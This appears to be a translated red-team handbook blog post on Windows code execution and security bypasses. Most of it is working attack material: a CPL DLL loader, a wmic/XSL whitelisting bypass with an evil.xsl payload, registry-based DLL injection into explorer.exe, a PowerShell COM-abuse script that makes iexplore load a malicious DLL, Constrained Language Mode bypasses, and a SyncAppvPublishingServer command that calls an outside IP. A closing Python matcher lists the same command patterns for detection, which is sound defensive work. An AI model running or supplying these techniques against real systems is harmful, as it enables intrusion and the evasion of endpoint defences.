Red Team Handbook

admin, 2020-11-08 15:56:16



Code execution







Execution via Control Panel (.cpl) files

A CPL file is essentially a Windows executable file, but not one that can run directly on its own; it is opened by shell32.dll or control.exe.

item.cpl


// dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"
#include <Windows.h>

//Cplapplet
extern "C" __declspec(dllexport) LONG Cplapplet(HWND hwndCpl, UINT msg, LPARAM lParam1, LPARAM lParam2)
{
    MessageBoxA(NULL, "Hey there, I am now your control panel item you know.", "Control Panel", 0);
    return 1;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        Cplapplet(NULL, NULL, NULL, NULL);
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}


Ways to execute it:

1. Double-clicking the file runs it

2. Calling shell32 through rundll32

rundll32 shell32, Control_RunDLL \\VBOXSVR\Experiments\cpldoubleclick\cpldoubleclick\Debug\cpldoubleclick.cpl

3. Via control.exe <pathtothe.cpl>






Bypassing antivirus with wmic and XSL (application whitelisting bypass)

evil.xsl

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc");
    ]]> </ms:script>
</stylesheet>

Run from cmd:

wmic os get /FORMAT:"evil.xsl"






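Process injection via the Control Panel

By modifying the Control Panel registry key, a malicious DLL is injected into explorer.exe.

Control Panel registry key:

HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs

Injection command:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs" /v spotless /d "C:\labs\cplAddin\cplAddin\x64\Release\cplAddin2.dll" /f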






Forcing iexplore.exe to load a malicious DLL via COM abuse

This technique requires iexplore.exe to be running on the target system.


# Code borrowed from https://github.com/nettitude/Invoke-PowerThIEf/blob/master/Invoke-PowerThIEf.ps1 by Rob Maslen

$CLSID = "55555555-5555-5555-5555-555555555555"
Remove-Item -Recurse -Force -Path "HKCU:\Software\Classes\CLSID\{$CLSID}" -ErrorAction SilentlyContinue

# path to the malicious DLL we want iexplore to load and execute
$payload = "\\VBOXSVR\Experiments\evilm64.dll"
New-Item -Path "HKCU:\Software\Classes\CLSID" -ErrorAction SilentlyContinue | Out-Null
New-Item -Path "HKCU:\Software\Classes\CLSID\{$CLSID}" | Out-Null
New-Item -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\InProcServer32" | Out-Null
New-Item -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\ShellFolder" | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\InProcServer32" -Name "(default)" -Value $Payload | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\InProcServer32" -Name "ThreadingModel" -Value "Apartment" | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\InProcServer32" -Name "LoadWithoutCOM" -Value "" | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\ShellFolder" -Name "HideOnDesktop" -Value "" | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\ShellFolder" -Name "Attributes" -Value 0xf090013d -PropertyType DWORD | Out-Null

# force iexplore to load the malicious DLL and execute it
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin) | ? {$_.fullname -match 'iexplore'} | Select-Object -First 1
$shWin.Navigate2("shell:::{$CLSID}", 2048)

Not yet tested; see: https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques/blob/master/offensive-security/code-execution/forcing-iexplore.exe-to-load-a-malicious-dll-via-com-abuse.md







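Bypassing PowerShell Constrained Language Mode

Constrained Language Mode:

It is a way of mitigating PowerShell attacks that blocks the execution of arbitrary unsigned code. When Device Guard or AppLocker is in enforcement mode, it is the most practical and effective enforced security measure, because any script or module not allowed by policy runs in Constrained Language Mode, which severely limits an attacker's ability to execute unsigned code.

1. PowerShell embedded in PowerShell

$a=[powershell]::Create();$a.AddCommand('whoami');$a.Invoke()

2. PowerShell version downgrade

Bypass the restriction with: powershell -version 2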







Running PowerShell inside PowerShell

If you are in an environment where running PowerShell is restricted:

1. Use rundll32

rundll32.exe PowerShdll.dll,main

2. Use SyncAppvPublishingServer, a new method on Windows 10; both SyncAppvPublishingServer.exe and SyncAppvPublishingServer.vbs can execute arbitrary commands

SyncAppvPublishingServer.vbs "Break; iwr http://10.0.0.5:443"
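
Seen from the detection side, most of the techniques above leave a distinctive process command line. The following Python matcher is an added example, not part of the original article: it checks command lines (as logged by, for instance, Sysmon Event ID 1 or Security event 4688) against the patterns on this page while ignoring stock Control Panel applets. Rule names and sample lines are constructed for illustration.

```python
import re

# Added example: rule names are hypothetical labels; patterns are taken from
# the command lines shown in this article.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

def cpl_outside_system(cmd):
    """True when a .cpl argument carries a path outside the system directories."""
    m = re.search(r'([^\s",]+\.cpl)\b', cmd, re.I)
    if not m:
        return False
    path = m.group(1).lower()
    if "\\" not in path:
        return False  # bare name (timedate.cpl): assumed to be a stock applet
    return not path.startswith(SYSTEM_DIRS)

# (rule name, pattern, optional extra check that trims false positives)
RULES = [
    ("cpl_nonsystem_path", r"\b(control|rundll32)(\.exe)?\b", cpl_outside_system),
    ("cpl_registry_add", r"\breg(\.exe)?\s+add\b.*\\Control Panel\\CPLs\b", None),
    ("wmic_xsl_format", r'\bwmic(\.exe)?\b.*/format:\s*"?[^"\s]*\.xsl', None),
    ("powershell_v2_downgrade",
     r"\bpowershell(\.exe)?\b.*\s-(v|ve|ver|vers|versi|versio|version)\s+2\b", None),
    ("powershdll_via_rundll32", r"\brundll32(\.exe)?\b.*\bPowerShdll(\.dll)?\b", None),
    ("syncappv_inline_command", r"\bSyncAppvPublishingServer(\.exe|\.vbs)?\b.*;", None),
]
COMPILED = [(n, re.compile(p, re.I), chk) for n, p, chk in RULES]

def detect(cmdline):
    """Return the names of every rule that matches one process command line."""
    return [n for n, rx, chk in COMPILED
            if rx.search(cmdline) and (chk is None or chk(cmdline))]

# Constructed process-creation command lines: five from this article, three benign.
SAMPLES = [
    r'rundll32 shell32, Control_RunDLL \\VBOXSVR\Experiments\cpldoubleclick\cpldoubleclick\Debug\cpldoubleclick.cpl',
    r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL C:\Windows\System32\timedate.cpl',
    r'control.exe timedate.cpl',
    r'wmic os get /FORMAT:"evil.xsl"',
    r'wmic os get caption /format:list',
    r'powershell -version 2',
    r'rundll32.exe PowerShdll.dll,main',
    r'SyncAppvPublishingServer.vbs "Break; iwr http://10.0.0.5:443"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(", ".join(detect(line)) or "-", "|", line)
```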



end





This article was first published on the WeChat official account 雷石安全实验室: Red Team Handbook
